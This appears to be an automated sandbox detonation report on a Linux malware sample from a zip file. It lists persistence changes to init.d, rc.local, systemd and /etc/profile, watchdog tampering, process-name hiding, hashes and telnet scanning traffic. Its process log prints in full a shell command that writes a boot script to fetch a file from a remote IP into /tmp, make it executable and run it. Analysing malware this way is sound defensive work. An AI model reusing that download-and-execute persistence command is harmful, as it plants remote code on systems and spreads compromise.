Analysis Overview
SHA256
35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Threat Level: Shows suspicious behavior
The file 19991040084.zip was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Modifies Watchdog functionality
Checks mountinfo of local process
Modifies init.d
Modifies systemd
Creates/modifies environment variables
Modifies rc script
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:23
Reported
2024-11-25 09:26
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
148s
Max time network
128s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /dev/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/2671/mountinfo | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /etc/init.d/system | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /etc/rc.local | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /etc/systemd/system/custom.service | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/self/status | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/mkdir | N/A |
Processes
/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/usr/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/usr/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 224.0.0.251:5353 | | udp |
| US | 154.216.19.139:199 | | tcp |
| US | 154.216.19.139:199 | | tcp |
| RU | 193.143.1.70:38242 | | tcp |
| SI | 193.95.244.99:23 | | tcp |
| JP | 126.233.138.16:23 | | tcp |
| CA | 65.95.4.51:23 | | tcp |
| US | 38.232.253.146:23 | | tcp |
| CN | 112.37.16.67:23 | | tcp |
| BR | 201.36.21.179:23 | | tcp |
| TN | 197.20.122.193:23 | | tcp |
| US | 65.249.12.62:23 | | tcp |
| DE | 53.84.242.79:23 | | tcp |
| US | 198.243.110.55:23 | | tcp |
| AU | 20.167.42.190:23 | | tcp |
| US | 136.75.38.49:23 | | tcp |
Files
/etc/systemd/system/custom.service
| Hash | Value |
| --- | --- |
| MD5 | 19a440fdac7f578f2fb33719698a082c |
| SHA1 | ebadce21c65d05ad62a324deb39c57aecd3edf2c |
| SHA256 | b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69 |
| SHA512 | 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb |
/etc/inittab
| Hash | Value |
| --- | --- |
| MD5 | 3d6b6e1b05ad5d0538ccd8804bcd279b |
| SHA1 | 0fc061b51c225d5bea072c939de05e8a856558bc |
| SHA256 | cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5 |
| SHA512 | 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98 |
/boot/bootcmd
| Hash | Value |
| --- | --- |
| MD5 | 735cae7d3cbab0f59d95f84790282103 |
| SHA1 | 1cb77931b3097f18988016c9ceba3280a5ccb2ae |
| SHA256 | dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b |
| SHA512 | 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe |
/etc/init.d/system
| Hash | Value |
| --- | --- |
| MD5 | f000251d92c773cc3ee1ca22cf5f0788 |
| SHA1 | e2386fe6a5f29b1e9e5ad5b38928c024f97105e6 |
| SHA256 | 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985 |
| SHA512 | 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2 |
/etc/init.d/sh
| Hash | Value |
| --- | --- |
| MD5 | c5583b6a699f62cb0a004c99842f5c70 |
| SHA1 | b232ef89bf9b36643b5956aaacfd295b9ce2a0a7 |
| SHA256 | 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b |
| SHA512 | a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d |
/etc/motd
| Hash | Value |
| --- | --- |
| MD5 | 2bd9b4be30579e633fc0191aa93df486 |
| SHA1 | 7d63a9bd9662e86666b27c1b50db8e7370c624ff |
| SHA256 | 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d |
| SHA512 | ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5 |